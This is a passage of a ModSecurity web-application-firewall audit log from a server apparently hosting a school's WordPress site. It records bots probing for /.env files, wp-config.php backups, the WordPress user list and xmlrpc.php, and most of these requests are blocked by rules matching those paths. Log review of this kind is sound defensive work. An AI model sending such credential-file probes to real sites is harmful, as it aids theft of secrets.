smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 89.46.110.107 X-Forwarded-Proto: http Connection: close Accept: */* --156e1f61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --156e1f61-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746547447193182 891 (- - -) Stopwatch2: 1746547447193182 891; combined=317, p1=275, p2=0, p3=0, p4=0, p5=42, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --156e1f61-Z-- --4becd238-A-- [06/May/2025:23:04:09 +0700] aBoy-b8Q_AFo5EvzOKvm4gAAAEM 103.236.140.4 53096 103.236.140.4 8181 --4becd238-B-- GET /wp-config.php_orig HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 94.152.11.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 94.152.11.127 X-Forwarded-Proto: http Connection: close Accept: */* --4becd238-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4becd238-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746547449021075 772 (- - -) Stopwatch2: 1746547449021075 772; combined=327, p1=285, p2=0, p3=0, p4=0, p5=41, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4becd238-Z-- --f34e6146-A-- [06/May/2025:23:27:40 +0700] aBo4fL5Kt25brCRGiyh9yQAAABY 103.236.140.4 37006 103.236.140.4 8181 --f34e6146-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.182.25.63 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.182.25.63 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept-Charset: utf-8 --f34e6146-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f34e6146-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746548860763161 732 (- - -) Stopwatch2: 1746548860763161 732; combined=301, p1=261, p2=0, p3=0, p4=0, p5=40, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f34e6146-Z-- --17042e24-A-- [07/May/2025:00:46:03 +0700] aBpK23Q-FFoo6luwbxIKVAAAANg 103.236.140.4 40214 103.236.140.4 8181 --17042e24-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 68.183.9.16 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 68.183.9.16 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --17042e24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --17042e24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746553563832243 889 (- - -) Stopwatch2: 1746553563832243 889; combined=357, p1=319, p2=0, p3=0, p4=0, p5=38, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17042e24-Z-- --51fd3e2b-A-- [07/May/2025:01:46:51 +0700] aBpZG75Kt25brCRGiyiQAQAAAAo 103.236.140.4 45710 103.236.140.4 8181 --51fd3e2b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 163.5.32.186 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 163.5.32.186 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --51fd3e2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --51fd3e2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746557211018820 792 (- - -) Stopwatch2: 1746557211018820 792; combined=310, p1=273, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51fd3e2b-Z-- --c09e2c5b-A-- [07/May/2025:02:44:24 +0700] aBpmmL8Q_AFo5EvzOKsD7wAAAFc 103.236.140.4 45156 103.236.140.4 8181 --c09e2c5b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.90 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c09e2c5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c09e2c5b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746560664400176 3140 (- - -) Stopwatch2: 1746560664400176 3140; combined=1329, p1=449, p2=848, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c09e2c5b-Z-- --aa18bf60-A-- [07/May/2025:02:44:26 +0700] aBpmmr8Q_AFo5EvzOKsD8QAAAEo 103.236.140.4 45172 103.236.140.4 8181 --aa18bf60-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --aa18bf60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa18bf60-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746560666850434 2998 (- - -) Stopwatch2: 1746560666850434 2998; combined=1220, p1=409, p2=783, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa18bf60-Z-- --32f30a4c-A-- [07/May/2025:02:44:29 +0700] aBpmnb8Q_AFo5EvzOKsD-QAAAFE 103.236.140.4 45204 103.236.140.4 8181 --32f30a4c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.90 X-Forwarded-Proto: http Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --32f30a4c-C-- demo.sayHello --32f30a4c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --32f30a4c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746560669263225 6981 (- - -) Stopwatch2: 1746560669263225 6981; combined=4963, p1=571, p2=4080, p3=41, p4=42, p5=130, sr=76, sw=99, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32f30a4c-Z-- --7447de63-A-- [07/May/2025:02:44:43 +0700] aBpmq78Q_AFo5EvzOKsEBAAAAEU 103.236.140.4 45312 103.236.140.4 8181 --7447de63-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.90 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7447de63-C-- demo.sayHello --7447de63-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7447de63-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746560683746435 28161 (- - -) Stopwatch2: 1746560683746435 28161; combined=19389, p1=617, p2=18450, p3=50, p4=68, p5=119, sr=132, sw=85, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7447de63-Z-- --c83ec31a-A-- [07/May/2025:02:53:49 +0700] aBpozb5Kt25brCRGiyiZMAAAAAo 103.236.140.4 49834 103.236.140.4 8181 --c83ec31a-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 43.130.153.36 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 43.130.153.36 X-Forwarded-Proto: https Connection: close Content-Length: 52 User-Agent: Go-http-client/1.1 Accept: application/dns-message Content-Type: application/dns-message --c83ec31a-C-- ¡10323614040test whitechunlol --c83ec31a-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --c83ec31a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746561229176749 5374 (- - -) Stopwatch2: 1746561229176749 5374; combined=4099, p1=814, p2=3131, p3=46, p4=71, p5=37, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c83ec31a-Z-- --9bdbe43a-A-- [07/May/2025:02:53:50 +0700] aBpoznQ-FFoo6luwbxIczgAAAMY 103.236.140.4 49856 103.236.140.4 8181 --9bdbe43a-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 43.130.153.36 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 43.130.153.36 X-Forwarded-Proto: https Connection: close Content-Length: 52 User-Agent: Go-http-client/1.1 Accept: application/dns-message Content-Type: application/dns-message --9bdbe43a-C-- ¡10323614040test whitechunlol --9bdbe43a-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bdbe43a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746561230624649 4059 (- - -) Stopwatch2: 1746561230624649 4059; combined=2662, p1=575, p2=1977, p3=39, p4=36, p5=34, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bdbe43a-Z-- --1177c840-A-- [07/May/2025:02:53:50 +0700] aBpoznQ-FFoo6luwbxIczwAAAMk 103.236.140.4 49858 103.236.140.4 8181 --1177c840-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 43.130.153.36 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 43.130.153.36 X-Forwarded-Proto: https Connection: close Content-Length: 52 User-Agent: Go-http-client/1.1 Accept: application/dns-message Content-Type: application/dns-message --1177c840-C-- ¡10323614040test whitechunlol --1177c840-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --1177c840-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746561230857917 4039 (- - -) Stopwatch2: 1746561230857917 4039; combined=2417, p1=551, p2=1775, p3=33, p4=31, p5=27, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1177c840-Z-- --83067b3d-A-- [07/May/2025:02:53:51 +0700] aBpoz75Kt25brCRGiyiZMQAAABY 103.236.140.4 49860 103.236.140.4 8181 --83067b3d-B-- POST /doh HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 43.130.153.36 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 43.130.153.36 X-Forwarded-Proto: https Connection: close Content-Length: 52 User-Agent: Go-http-client/1.1 Accept: application/dns-message Content-Type: application/dns-message --83067b3d-C-- ¡10323614040test whitechunlol --83067b3d-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --83067b3d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746561231091879 3002 (- - -) Stopwatch2: 1746561231091879 3002; combined=2025, p1=464, p2=1487, p3=20, p4=23, p5=31, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83067b3d-Z-- --cc3fdd35-A-- [07/May/2025:05:10:25 +0700] aBqI0YyiPdJj1JUH57pmvAAAABE 103.236.140.4 48906 103.236.140.4 8181 --cc3fdd35-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.89.112.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.89.112.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --cc3fdd35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc3fdd35-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746569425974268 929 (- - -) Stopwatch2: 1746569425974268 929; combined=373, p1=333, p2=0, p3=0, p4=0, p5=39, sr=121, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc3fdd35-Z-- --2a12a427-A-- [07/May/2025:05:51:39 +0700] aBqSe4yiPdJj1JUH57pm1QAAABE 103.236.140.4 49382 103.236.140.4 8181 --2a12a427-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 202.51.216.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.51.216.112 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --2a12a427-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a12a427-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746571899064173 919 (- - -) Stopwatch2: 1746571899064173 919; combined=344, p1=311, p2=0, p3=0, p4=0, p5=33, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a12a427-Z-- --98ac7569-A-- [07/May/2025:05:51:39 +0700] aBqSe12wLCWKKTe5QCGxAAAAAEA 103.236.140.4 49386 103.236.140.4 8181 --98ac7569-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 202.51.216.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.51.216.112 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --98ac7569-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --98ac7569-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746571899186994 759 (- - -) Stopwatch2: 1746571899186994 759; combined=284, p1=249, p2=0, p3=0, p4=0, p5=35, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --98ac7569-Z-- --87b8e524-A-- [07/May/2025:05:51:39 +0700] aBqSe4yiPdJj1JUH57pm1gAAABI 103.236.140.4 49390 103.236.140.4 8181 --87b8e524-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 202.51.216.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.51.216.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --87b8e524-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --87b8e524-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746571899270075 811 (- - -) Stopwatch2: 1746571899270075 811; combined=361, p1=327, p2=0, p3=0, p4=0, p5=34, sr=160, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87b8e524-Z-- --7f31b82e-A-- [07/May/2025:07:26:21 +0700] aBqorUkjCPYF0_E6F_IURAAAAJI 103.236.140.4 50082 103.236.140.4 8181 --7f31b82e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Whale/1.5.75.9 Safari/537.36 Accept-Charset: utf-8 --7f31b82e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f31b82e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746577581871536 909 (- - -) Stopwatch2: 1746577581871536 909; combined=338, p1=297, p2=0, p3=0, p4=0, p5=41, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f31b82e-Z-- --d802343c-A-- [07/May/2025:08:15:22 +0700] aBq0Kl2wLCWKKTe5QCGyXwAAAEA 103.236.140.4 51246 103.236.140.4 8181 --d802343c-B-- GET /wp-config.php_ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 74.208.58.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 74.208.58.160 X-Forwarded-Proto: http Connection: close Accept: */* --d802343c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d802343c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746580522049206 827 (- - -) Stopwatch2: 1746580522049206 827; combined=304, p1=266, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d802343c-Z-- --7bc55336-A-- [07/May/2025:08:17:27 +0700] aBq0p0kjCPYF0_E6F_IVJgAAAJM 103.236.140.4 51256 103.236.140.4 8181 --7bc55336-B-- GET 